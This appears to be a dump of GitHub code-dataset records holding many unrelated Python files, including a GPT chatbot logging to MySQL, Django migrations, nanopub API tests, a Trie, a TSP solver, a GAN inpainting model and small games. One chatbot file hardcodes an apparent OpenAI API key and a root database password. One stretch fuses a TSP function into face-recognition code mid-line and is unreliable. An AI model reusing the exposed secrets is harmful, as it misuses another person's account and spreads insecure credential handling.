is_edited = True\n\n    # Make target.png\n    cv2.imwrite(target_image_name, src)\n\n    print('Returning: ', is_edited) \n    return is_edited\n\n    \n","repo_name":"RelaxBacteria/Live-Dictionary","sub_path":"source/preProcess.py","file_name":"preProcess.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36869827052","text":"import datetime\nimport mysql.connector\nimport openai\nif __name__ == \"__main__\":\n    openai.api_key = \"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\"\n    conn = mysql.connector.connect(\n        host=\"localhost\",\n        user=\"root\",\n        password=\"root@123\",\n        database=\"mysql\"\n    )\n    cursor = conn.cursor()\n    cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS history (\n    QUERY VARCHAR(50) NOT NULL,\n    ANSWER VARCHAR(500) NOT NULL,\n    date DATE NOT NULL\n    );\"\"\");\n    while (1):\n        prompt = input(\"user: \")\n\n        if (prompt == \"exit\"):\n            break;\n\n        response = openai.ChatCompletion.create(\n            model=\"gpt-3.5-turbo\",\n            messages=[{\"role\": \"user\", \"content\": prompt}]\n        )\n        print(\"bot: \"+response['choices'][0]['message']['content'])\n        print()\n        res = \"\"\n        res += prompt\n        res += \"\\n\"\n        res += response['choices'][0]['message']['content']\n        date_now = datetime.datetime.now();\n        sql = \"INSERT INTO history (QUERY,ANSWER,date) VALUES (%s, %s, %s)\"  # insert into the table created above\n        val = (prompt,response['choices'][0]['message']['content'],date_now)\n        cursor.execute(sql, val)\n        conn.commit()\n","repo_name":"anirudh89201/chat-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34259130942","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf 
import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('jobs', '0006_auto_20151116_0700'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='JobExportRequest',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('created_by', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ('export', models.ForeignKey(to='jobs.JobExport')),\n ],\n ),\n migrations.AddField(\n model_name='job',\n name='created_by',\n field=models.ForeignKey(default=3, to=settings.AUTH_USER_MODEL),\n preserve_default=False,\n ),\n ]\n","repo_name":"aeud/sing","sub_path":"apps/jobs/migrations/0007_auto_20151116_0720.py","file_name":"0007_auto_20151116_0720.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1478793632","text":"\nimport json\nfrom rdflib import ConjunctiveGraph, Graph, URIRef\nfrom rdflib.namespace import RDF\nfrom whyis.test.api_test_case import ApiTestCase\n\n\nclass NanopubTest(ApiTestCase):\n\n turtle = '''\n \"Professor\";\n \"Jane Doe\" ;\n \"(425) 123-4567\" ;\n ;\n .\n'''\n\n def test_create(self):\n self.login_new_user()\n response = self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\",\n expected_headers=[\"Location\"])\n\n nanopub = self.app.nanopub_manager.get(URIRef(response.headers['Location']))\n self.assertEquals(len(nanopub), 17)\n self.assertEquals(len(nanopub.assertion), 5)\n self.assertEquals(len(nanopub.pubinfo), 5)\n self.assertEquals(len(nanopub.provenance), 0)\n\n def test_read(self):\n self.login_new_user()\n response = self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\",\n expected_headers=[\"Location\"])\n\n nanopub_id = response.headers['Location'].split('/')[-1]\n content = self.client.get(\"/pub/\"+nanopub_id,\n headers={'Accept':'application/json'},\n follow_redirects=True)\n g = ConjunctiveGraph()\n self.assertEquals(content.mimetype, \"application/json\")\n g.parse(data=str(content.data, 'utf8'), format=\"json-ld\")\n\n self.assertEquals(len(g), 17)\n self.assertEquals(g.value(URIRef('http://example.com/janedoe'), RDF.type),\n URIRef('http://schema.org/Person'))\n\n def test_delete_admin(self):\n self.login_new_user()\n response = self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\",\n expected_headers=[\"Location\"])\n\n nanopub_id = response.headers['Location'].split('/')[-1]\n response = self.client.delete(\"/pub/\"+nanopub_id, follow_redirects=True)\n self.assertEquals(response.status, '204 NO CONTENT')\n\n def test_delete_nonadmin(self):\n self.login_new_user(role=None)\n response = self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\",\n expected_headers=[\"Location\"])\n\n nanopub_id = response.headers['Location'].split('/')[-1]\n response = self.client.delete(\"/pub/\"+nanopub_id, follow_redirects=True)\n self.assertEquals(response.status, '204 NO CONTENT')\n\n def test_linked_data(self):\n self.login_new_user()\n self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\")\n\n # Because of (lack of) content negotiation\n content = self.get_view(uri=\"http://example.com/janedoe\",\n mime_type=\"text/turtle\")\n\n g = Graph()\n g.parse(data=str(content.data, 'utf8'), format=\"turtle\")\n\n self.assertEquals(len(g), 5)\n 
self.assertEquals(g.value(URIRef('http://example.com/janedoe'), RDF.type),\n URIRef('http://schema.org/Person'))\n\n def test_mime_behavior(self):\n self.login_new_user()\n self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\")\n\n self.get_view(uri=\"http://example.com/janedoe\",\n mime_type=\"text/turtle\",\n expected_template=\"describe.json\")\n\n self.get_view(uri=\"http://example.com/janedoe\",\n headers={'Accept': 'text/html'},\n mime_type=\"text/html\",\n expected_template=\"resource_view.html\")\n\n def test_attribute_view(self):\n self.login_new_user()\n self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\")\n\n content = self.get_view(uri=\"http://example.com/janedoe\",\n view=\"attributes\",\n mime_type=\"application/json\")\n\n json_content = json.loads(str(content.data, 'utf8'))\n self.assertEquals(json_content['label'], \"Jane Doe\")\n self.assertEquals(len(json_content['type']), 1)\n self.assertEquals(json_content['type'][0]['label'], 'Person')\n\n def test_ontology_describe_view(self):\n self.login_new_user()\n ontology = \"\"\"\n .\n \"Professor\";\n \"Jane Doe\" ;\n \"(425) 123-4567\" ;\n ;\n . \"\"\"\n\n self.publish_nanopub(data=ontology,\n content_type=\"text/turtle\")\n\n content = self.get_view(uri=\"http://example.com/\",\n view=\"describe\",\n mime_type=\"application/json\",\n expected_template=\"describe_ontology.json\")\n\n data = json.loads(str(content.data, 'utf8'))\n self.assertIsInstance(data, list, \"'describe' view returned unexpected structure\")\n self.assertTrue(data, \"'describe' view returned empty list\")\n self.assertIn(\"@graph\", data[0], \"'describe' view missing @graph key\")\n self.assertIn(\"@id\", data[0], \"'describe' view missing @id key for graph\")\n\n graph = data[0][\"@graph\"]\n self.assertEqual(len(graph), 2, \"'describe' view returned the wrong number of subjects\")\n\n for subject in graph:\n if subject[\"@id\"] == \"http://example.com/\":\n self.assertEqual(len(subject.keys()), 2,\n \"Subject in 'describe' view has unexpected number of predicates\")\n self.assertIn(\"http://www.w3.org/2002/07/owl#Ontology\", subject[\"@type\"],\n \"Expected an ontology type object in the 'describe' view\")\n elif subject[\"@id\"] == \"http://example.com/janedoe\":\n self.assertEqual(len(subject.keys()), 6,\n \"Subject in 'describe' view has unexpected number of predicates\")\n","repo_name":"mobilemadman2/whyis","sub_path":"tests/api/test_nanopubs.py","file_name":"test_nanopubs.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"34246775828","text":"# The change in airline revenues from baggage fees, from 2013 to 2014\nimport requests\nfrom lxml import html\n# Note that the BTS provides CSV versions of each year\n# So using HTML parsing is the dumb way to do this. oh well\nBASE_URL = 'https://www.rita.dot.gov/bts/sites/rita.dot.gov.bts/files/subject_areas/airline_information/baggage_fees/html/%s.html'\nyear_totes = {2013: 0, 2014: 0}\n\nfor yr in year_totes.keys():\n url = BASE_URL % yr\n resp = requests.get(url)\n doc = html.fromstring(resp.text)\n # Incredibly sloppy way of getting the total value from\n # the bottom-right cell of the table. 
oh well\n    tval = doc.cssselect('tr td')[-1].text_content().strip()\n    year_totes[yr] = int(tval.replace(',', '')) * 1000 # it's in 000s\n\nprint(year_totes[2014] - year_totes[2013])\n# 179236000\n","repo_name":"stanfordjournalism/search-script-scrape","sub_path":"scripts/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1228,"dataset":"github-code","pt":"48"} +{"seq_id":"31081697555","text":"class TrieNode:\n    def __init__(self):\n        self.children = {}\n        self.end = False\n        self.words = []\nclass Trie:\n    def __init__(self):\n        self.node = TrieNode()\n    \n    def insert(self,word):\n        cur = self.node\n        for char in word:\n            if char not in cur.children:\n                cur.children[char] = TrieNode()\n            cur = cur.children[char]\n        cur.end = True\n        cur.words.append(word)\n    \n    def get(self,word):\n        if word[0] not in self.node.children:\n            return word\n        \n        cur = self.node\n        for char in word:\n            if char not in cur.children:\n                break\n            if cur.end:\n                break\n            cur = cur.children[char]\n        \n        if cur.end:\n            return cur.words[0]\n        return word\n    \nclass Solution:\n    def replaceWords(self, dictionary: List[str], sentence: str) -> str:\n        sent = sentence.split()\n\n\n        t = Trie()\n        for word in dictionary:\n            t.insert(word) \n        \n        ans = [] \n        for word in sent:\n            ans.append(t.get(word))\n        \n        return ' '.join(ans)\n    ","repo_name":"Merwan-J/competetive-programming","sub_path":"648-replace-words/648-replace-words.py","file_name":"648-replace-words.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22922478393","text":"import json\nimport os\nimport traceback  # needed by save_settings below\n\n\nSETTINGS_FILE_PATH = \"./game_settings.json\"\nDEFAULT_SETTINGS = {\n    \"num_rows\": 3,\n    \"num_columns\": 3,\n    \"win_target\": 3,\n    \"player_name_1\": \"Rick\",\n    \"player_name_2\": \"Morty\",\n}\n\n\ndef load_settings(file_path):\n    settings_file_exists = os.path.exists(file_path) and os.path.isfile(file_path)\n    if settings_file_exists:\n        try:\n            with open(file_path, \"r\") as file_pointer:\n                settings = json.load(file_pointer)\n                if (\n                    int(settings[\"num_rows\"]) == settings[\"num_rows\"]\n                    and int(settings[\"num_columns\"]) == settings[\"num_columns\"]\n                    and int(settings[\"win_target\"]) == settings[\"win_target\"]\n                    and str(settings[\"player_name_1\"]) == str(settings[\"player_name_1\"])\n                    and str(settings[\"player_name_2\"]) == str(settings[\"player_name_2\"])\n                ):\n                    num_rows = settings[\"num_rows\"]\n                    num_columns = settings[\"num_columns\"]\n\n                    if not (\n                        2 <= num_rows <= 20\n                        and 2 <= num_columns <= 20\n                        and settings[\"win_target\"] <= max(num_rows, num_columns)\n                    ):\n                        raise Exception(\"Invalid board configuration\")\n\n                    return settings\n        except Exception:\n            pass\n\n    return DEFAULT_SETTINGS\n\n\ndef save_settings(file_path, settings):\n    try:\n        with open(file_path, \"w\") as file_pointer:\n            json.dump(settings, file_pointer)\n    except Exception:\n        print(traceback.format_exc())\n","repo_name":"arelimdz/tictactoe-cli","sub_path":"src/settings_file_io.py","file_name":"settings_file_io.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32542190019","text":"# Tom Croshaw - Project 1\n# Problem 1 - PYTHON 3\n# For this problem you will be writing a function that takes the supplied dictionary input_dict and operates on it.\n\nimport string\n\ninput_dict = {'list':[1,2,3,4], 'tuple':('cat', 'dog'), 'integer':1,\n              'float':99.99, 
1:'integer', 2:'integer_2', 'Uppercase_string':'ABCD',\n             'CHARACTER':'C'}\n\nvowels = 'aeiou'\nconsonents = string.ascii_lowercase\n\ndef modify_dict(dict):\n    print ('Input Dictionary: ',input_dict)\n    dict_new = {}\n    # Iterate through the keys\n    for key in dict:\n        key = str(key)\n        # For pairs where the key starts with a lowercase vowel, change the value to \"vowel\".\n        if key[0].lower() in vowels:\n            dict_new[key] = \"vowel\"\n        # For pairs where the key starts with a lowercase consonant, change the value to \"consonant\".\n        elif key[0].lower() in consonents and key[0].lower() not in vowels:\n            dict_new[key] = \"consonant\"\n        # else return nothing\n        else:\n            pass\n    print ('Output Dictionary: ',dict_new)\n    return dict_new\n\nassert (modify_dict(input_dict))\n","repo_name":"Indu4191/Data_sci","sub_path":"Project1_uploads/Tom/project-1.1.py","file_name":"project-1.1.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20450443796","text":"N = int(input())\r\ncost = [list(map(int,input().split())) for _ in range(N)]\r\n\r\ndef find(visited,now):\r\n    if dp[visited][now]: return dp[visited][now]\r\n    if visited == (1<<N)-1: return cost[now][0] if cost[now][0] > 0 else 10**9\r\n    \r\n    tmp = 10**8\r\n    for i in range(1,N):\r\n        if (not (visited >> i) % 2) and cost[now][i]:\r\n            tmp = min(tmp, find(visited | (1<<i), i) + cost[now][i])\r\n        if conf>50:\n            if int(Id) in Roll_present:\n                pass\n            else:\n                Roll_present.append(int(Id))\n        else:\n            Id = \"Unknown\" \n\n            # Put text describing who is in the picture\n            cv2.rectangle(im, (x-22,y-90), (x+w+22, y-22), (0,255,0), -1)\n            cv2.putText(im, str(Id), (x,y-40), font, 1, (255,255,255), 3)\n            cv2.imshow('Cam----Press q to quit',im)\n\n        # Display the video frame with the bounding rectangle\n        \n\n        # If 'q' is pressed, close program\n        if cv2.waitKey(10) & 0xFF == ord('q'):\n            break\n\n    # Stop the camera\n    cam.stop()\n\n    # Close all windows\n    cv2.destroyAllWindows()\n\n    return Roll_present","repo_name":"shohan-cse/Face-Recognition-Based-Attendance-System","sub_path":"web_app/take_attendance.py","file_name":"take_attendance.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"73513771664","text":"import time\ndef selection_sort(arr):\n    start = time.time()\n    n = len(arr)\n    \n    for i in range(n-1):\n        # Assume the current element is the minimum\n        min_index = i\n        \n        # Find the minimum element in the remaining unsorted part\n        for j in range(i+1, n):\n            if arr[j] < arr[min_index]:\n                min_index = j\n        \n        # Swap the minimum element with the current element\n        arr[i], arr[min_index] = arr[min_index], arr[i]\n    end = time.time()\n    time_taken = end-start\n    print(\"Total time taken to execute: \",time_taken)\n# Example usage:\narr = [5, 3, 8, 4, 2]\nselection_sort(arr)\nprint(arr)\n","repo_name":"mohan87927/DS-with-Python-Programs","sub_path":"selection_sort_algo.py","file_name":"selection_sort_algo.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43357851641","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom models import Generator, Discriminator\nfrom loss_functions import _l1_loss, _generator_adversarial_loss, _generator_least_squares_loss\nfrom loss_functions import _discriminator_adversarial_loss, _discriminator_least_squares_loss, tv_loss, style_loss\nfrom options import Options as opt\nfrom utils import get_optimizer, 
extract_features, gram_matrix, sample_noise\n\n\nclass InpaintingModel:\n def __init__(self, is_train: bool = True, device: torch.device = torch.device('cpu'),\n dtype: torch.dtype = torch.float32):\n self.isTrain = is_train\n self.device = device\n self.dtype = dtype\n self.input = None\n self.masks = None\n self.masked_input = None\n self.masked_input_with_mask = None\n self.generated_images = None\n self.loss_D = None\n self.loss_D_real = None\n self.loss_D_fake = None\n self.loss_G = None\n self.loss_style = None\n self.loss_tv = None\n self.net_G = Generator(input_nc=4, output_nc=3, levels=5, u_net=True).to(self.device)\n\n if self.isTrain:\n self.net_D = Discriminator(input_nc=3).to(self.device).to(self.dtype)\n self.optimizer_G = get_optimizer(model=self.net_G, lr=opt.g_lr, beta1=opt.g_beta1)\n self.optimizer_D = get_optimizer(model=self.net_D, lr=opt.d_lr, beta1=opt.d_beta1)\n\n if opt.use_style:\n self.style_cnn = torchvision.models.vgg13_bn(pretrained=True).features\n self.style_cnn.to(self.dtype).to(self.device)\n self._set_requires_grad(self.style_cnn, True)\n\n def set_input(self, input: torch.Tensor, masks: torch.Tensor):\n self.masks = masks.to(self.device)\n self.input = input.to(self.device).to(self.dtype)\n self.masked_input = self.masks * self.input + (~self.masks) * sample_noise(self.input.size(),\n self.dtype, self.device)\n self.masked_input_with_mask = torch.cat([self.masked_input, self.masks], dim=1)\n\n def forward(self):\n self.generated_images = self.net_G(self.masked_input_with_mask) # G(A)\n return self.generated_images\n\n def backward_D(self):\n pred_fake = self.net_D(self.generated_images.detach())\n pred_real = self.net_D(self.input)\n self.loss_D, self.loss_D_real, self.loss_D_fake = self.discriminator_loss(pred_real, pred_fake)\n self.loss_D.backward()\n\n def backward_G(self):\n pred_fake = self.net_D(self.generated_images)\n self.loss_G = self.generator_loss(pred_fake, self.input, self.generated_images)\n self.loss_G.backward()\n\n def compute_style_loss(self):\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n input = normalize((self.input + 1) / 2)\n feats = extract_features(input, self.style_cnn)\n style_targets = []\n for idx in opt.style_layers:\n style_targets.append(gram_matrix(feats[idx].clone()))\n generated = normalize((self.generated_images + 1) / 2)\n feats = extract_features(generated, self.style_cnn)\n s_loss = style_loss(feats, opt.style_layers, style_targets, opt.style_weights)\n t_loss = tv_loss(self.generated_images, opt.tv_weight)\n self.loss_style = s_loss\n self.loss_tv = t_loss\n return self.loss_style + self.loss_tv\n\n def generator_loss(self, scores_fake, input_to_generator, output_to_generator):\n if opt.ls_gan_mode:\n gan_loss = _generator_least_squares_loss(scores_fake)\n else:\n gan_loss = _generator_adversarial_loss(scores_fake, self.device)\n\n loss = (1 - opt.l1_weight) * gan_loss + opt.l1_weight * _l1_loss(input_to_generator, output_to_generator)\n if opt.use_style:\n loss += self.compute_style_loss()\n return loss\n\n def discriminator_loss(self, scores_real, scores_fake):\n if opt.ls_gan_mode:\n return _discriminator_least_squares_loss(scores_real, scores_fake)\n return _discriminator_adversarial_loss(scores_real, scores_fake, self.device)\n\n def optimize_parameters(self):\n self.forward() # compute fake images: G(A)\n # update D\n self._set_requires_grad(self.net_D, True)\n self.optimizer_D.zero_grad()\n self.backward_D()\n self.optimizer_D.step()\n # update G\n 
self._set_requires_grad(self.net_D, False)\n        self.optimizer_G.zero_grad()\n        self.backward_G()\n        self.optimizer_G.step()\n\n    @staticmethod\n    def _set_requires_grad(net, requires_grad=False):\n        if net is not None:\n            for param in net.parameters():\n                param.requires_grad = requires_grad\n\n    def eval(self):\n        self.net_G.eval()\n        if self.isTrain:\n            self.net_D.eval()\n            self.style_cnn.eval()\n\n    def train(self):\n        self.net_G.train()\n        if self.isTrain:\n            self.net_D.train()\n            self.style_cnn.train()\n\n","repo_name":"Ella475/image-inpainting-using-gan","sub_path":"inpainting_model.py","file_name":"inpainting_model.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35612730934","text":"from django.urls import path \nfrom . import views \nurlpatterns = [\n    path('',views.Index,name='index'),\n    path('deta/',views.Data,name='deta'),\n    path('btn',views.Button,name='Button'),\n    path('delete/',views.Delt,name='delete'),\n    path('signup',views.signup,name=\"signup\"),\n    path('login',views.login,name=\"login\"),\n    path('logout',views.logout,name=\"logout\"),\n\n]\n","repo_name":"abhijithtp/To_Do_List","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6388347600","text":"import pytest\n\nfrom src.person import Person\n\n\n@pytest.mark.describe('Person tests:')\nclass TestPerson:\n\n    @pytest.mark.it(\"Person set data ok\")\n    def test_should_set_correct_data(self) -> None:\n        name = 'Test Name'\n        age = 15\n\n        expected_dict = {\n            'name': name,\n            'age': age,\n        }\n\n        person = Person(name, age)\n\n        assert person.name == 'Test'\n        assert person.last_name == 'Name'\n        assert person.age == age\n\n        assert person.to_dict() == expected_dict\n\n        assert str(person) == f'Name: {name} | Age: {age}'\n","repo_name":"gustavoSaboia97/test_studies","sub_path":"tests/unit/test_person.py","file_name":"test_person.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38260982210","text":"import random\n\n\nWORD_LIST = ['book', 'computer', 'phone', 'spiderman', 'plastic', 'cookies', 'lasagna', 'pizza', 'pasta', 'basketball',\n             'volleyball', 'wine', 'apple']\nINITIAL_GUESSES = 8 # Initial number of guesses player starts with\n\n\ndef play_game(secret_word):\n    \"\"\"\n    Add your code (remember to delete the \"pass\" below)\n    \"\"\"\n    word = ''\n    for i in range (0, len(secret_word)):\n        word = word+\"-\"\n    return word\n\ndef get_word():\n    \"\"\"\n    This function returns a secret word that the player is trying\n    to guess in the game. \n    \"\"\"\n    # Build the full candidate list; appending outside the loop kept only the last word.\n    my_list = []\n    for word in WORD_LIST:\n        my_list.append(word.strip())\n    secret_word = random.choice(my_list)\n    return secret_word\n\n\n\ndef main():\n    \"\"\"\n    To play the game, we first select the secret word for the\n    player to guess and then play the game using that secret word.\n    \"\"\"\n    secret_word = get_word()\n    dashes = play_game(secret_word)\n    length = len(secret_word)\n    n = 0\n    print('The word now looks like this: ' + str(dashes))\n    print('You have ' + str(INITIAL_GUESSES) + ' guesses left')\n    while secret_word != dashes:\n        letter = input(\"Please guess a single letter: \")\n        for i in range(0, length):\n            if letter == secret_word[i]:\n                dashes = dashes[:i] + letter + dashes[i + 1:]\n                if \"-\" not in dashes:\n                    print(\"Congratulations. 
The word is: \" + str(secret_word))\n break\n if letter.isalpha() and len(letter) == 1:\n if letter in secret_word:\n print(\"That guess is correct. The word is now \" + dashes)\n if letter not in secret_word and len(letter) == 1:\n n = n + 1\n print(\"There are no \" + str(letter) + \"'s in this word\")\n print(\"The word is now \" + dashes)\n print(\"You have \" + str(INITIAL_GUESSES - n) + \" guesses left.\")\n if n == INITIAL_GUESSES and secret_word == dashes:\n print(\"Congratulations.The word is: \" + str(secret_word))\n break\n if n == INITIAL_GUESSES:\n print(\"Sorry you lost. The secret word was \" + str(secret_word))\n\n# This provided line is required at the end of a Python file\n# to call the main() function.\nif __name__ == \"__main__\":\n main()\n","repo_name":"cavmp/200DaysofCode","sub_path":"Day25-WordGuess.py","file_name":"Day25-WordGuess.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7159255933","text":"# https://www.acmicpc.net/problem/17472\nfrom collections import deque\nmove = [(1,0), (-1,0), (0,1), (0,-1)]\nN, M = map(int, input().split()) # 세로, 가로\ngraph = [list(map(int, input().split())) for _ in range(N)]\n\ndef findGroup(i,j):\n for k in range(len(groupList)):\n for node in groupList[k]:\n if node[0] == i and node[1] == j:\n return k\n\ndef dfs(y,x, mode, cost): # 같은 그룹인지 체크하는 로직\n if graph[y][x] == 1: # 종료조건\n if cost == 1 or cost == 2:\n return None\n elif cost >= 3:\n return cost - 1, findGroup(y,x)\n \n dy, dx = move[mode]\n ny = dy + y\n nx = dx + x\n \n if N > ny >=0 and M > nx >=0:\n return dfs(ny,nx, mode, cost + 1)\n \n return None\n\ndef bfs(i,j):\n group = []\n queue = deque()\n if not visited[i][j] and graph[i][j] == 1:\n queue.append([i,j])\n group.append([i,j])\n visited[i][j] = True\n while queue:\n y , x = queue.popleft()\n for dy, dx in move:\n ny = dy + y\n nx = dx + x\n if N > ny >=0 and M > nx >=0 and not visited[ny][nx] and graph[ny][nx] == 1:\n visited[ny][nx] = True\n queue.append([ny,nx])\n group.append([ny,nx])\n\n return group\n else:\n return None\n \ndef getParent(v1, parent):\n if v1 != parent[v1]:\n parent[v1] = getParent(parent[v1], parent)\n return parent[v1]\n \ndef union(v1,v2, parent):\n a = getParent(v1, parent)\n b = getParent(v2, parent)\n \n if a > b: # 더 작은 노드를 parent값을 선정한다.\n parent[a] = b\n else:\n parent[b] = a\n \ngroupList = []\nvisited = [[False for _ in range(M)] for _ in range(N)]\nfor i in range(N):\n for j in range(M):\n result = bfs(i,j)\n if result != None:\n groupList.append(result)\n \nnodegraph = []\nfor k in range(len(groupList)):\n for node in groupList[k]:\n y, x = node\n for i in range(4): # 가로,세로를 돌려본다\n result = dfs(y,x,i, 0)\n if result != None:\n nodegraph.append((result[0],k,result[1])) # cost, 시작, 종료\n \nnodegraph.sort()\nparent = [v1 for v1 in range(len(groupList))] # 자기자신을 부모노드로 초기화\nresult = 0\ncounter = 0\nfor cost, start, end in nodegraph:\n if getParent(start, parent) != getParent(end, parent):\n union(start, end, parent)\n result += cost\n counter += 1\n \nif counter == len(groupList)-1: # 노드-1 의 개수와 간선의 개수가 같으면 최소신장트리 조건\n print(result)\nelse:\n print(-1)","repo_name":"rhkdguskim/Study","sub_path":"알고리즘/이것이코딩테스트다스터디/탐색/dfs/다리만들기 2.py","file_name":"다리만들기 2.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40875455004","text":"\nfrom random import random, uniform, choice\n\n\nfrom 
py_classes.epsilon_greedy_class import Creative\n\nCreative.reset_ads()\n\nad_1 = Creative('puppies', random(), uniform(1,10))\nad_2 = Creative('cats', random(), uniform(1,10))\nad_3 = Creative('elephants', random(), uniform(1,10))\nad_4 = Creative('bears', random(), uniform(1,10))\nad_5 = Creative('rhinos', random(), uniform(1,10))\n# ad_5 = Creative('sports', .2, 10)\n\n\nad_1.rate = random()\nad_1.reward = uniform(1,10)\nad_2.rate = random()\nad_2.reward = uniform(1,10)\nad_3.rate = random()\nad_3.reward = uniform(1,10)\nad_4.rate = random()\nad_4.reward = uniform(1,10)\n\n# Creative.history.head(20)\n#\n# Creative.history.tail()\n\n\nCreative.simulate_n(epsilon=0.7, n_steps=500)\n\nCreative.history[['eg_rev', 'rand_rev']].sum(axis=0)\n\nimport plotly.express as px\n\nrunning_total = Creative.history[['eg_rev', 'rand_rev']].cumsum()\n\nx = running_total.stack().reset_index().rename({'level_0':'step', 'level_1':'type', 0:'Running Total'}, axis=1)\n\npx.line(x, x='step', y=\"Running Total\", color='type')\n\n\n\nfor i in range(100):\n ad = Creative.epsilon_greedy(.5)\n if ad.get_reward() > 0:\n print(f\"{ad.name}: Yay! Making Money\")\n else:\n print(f\"{ad.name}: ... bust\")\n\nad_1.Q\nad_2.Q\nad_3.Q\nad_4.Q\nad_5.Q\n\nad_1.reward\nad_2.reward\nad_3.reward\nad_4.reward\nad_5.reward\n\n\n\nad_1.calc_rate()\n\nad_1.calc_Q()\nad_1.displays\nad_2.displays\nad_3.displays\nad_4.displays\n\nx = [1,2,3]\ny = ['a', 'b', 'c']\n\nfor n, l in enumerate(zip(x,y)):\n print(f'{n}: {l}')\n\n\nx = 1\n\nx += 1 if not True else 0\nx\nx += 1 if not False else 0\nx\n\n\nimport pandas as pd\nx = pd.DataFrame(columns=['eg_pick', 'ran_pick', 'eg_rev', 'rand_rev'], index=[0], data=[[0,0,0,0]])\n\nstep = 1\nx.loc[1,'eg_pick'] = 1\nx.loc[1,'ran_pick'] = 2\nx\n\nx.index.max()\n","repo_name":"Hersh-E/MAB-ADS-Example","sub_path":"scratchpad/MAB_test.py","file_name":"MAB_test.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73897359187","text":"'''\nCreated on Jun 18, 2013\n\n@author: Yubin Bai\n\nAll rights reserved.\n'''\n\nimport time\nfrom multiprocessing.pool import Pool\nfrom itertools import compress\nparallelSolve = False\nINF = 1 << 32\n\ndef solve(par):\n n, m, c, amp, ops = par\n status = [0] * n\n currMax = 0\n for o in ops:\n status[o - 1] += 1\n s = sum(compress(amp, status))\n if s > c:\n return 'Blown'\n currMax = max(currMax, s)\n status[o - 1] %= 2\n return 'Secure, max is %d' % currMax\n \n \nclass Solver:\n def getInput(self):\n self.numOfTests = 0\n self.input = []\n while True:\n n, m, c = map(int, self.fIn.readline().strip().split())\n if n == 0:\n break\n self.numOfTests += 1\n amp = []\n for i in range(n):\n amp.append(int(self.fIn.readline()))\n ops = []\n for i in range(m):\n ops.append(int(self.fIn.readline()))\n self.input.append((n, m, c, amp, ops))\n \n def __init__(self):\n self.fIn = open('input.txt')\n self.fOut = open('output.txt', 'w')\n self.results = []\n \n def parallel(self):\n self.getInput()\n p = Pool(4)\n millis1 = int(round(time.time() * 1000))\n self.results = p.map(solve, self.input)\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def sequential(self):\n self.getInput()\n millis1 = int(round(time.time() * 1000))\n for i in self.input:\n self.results.append(solve(i))\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n 
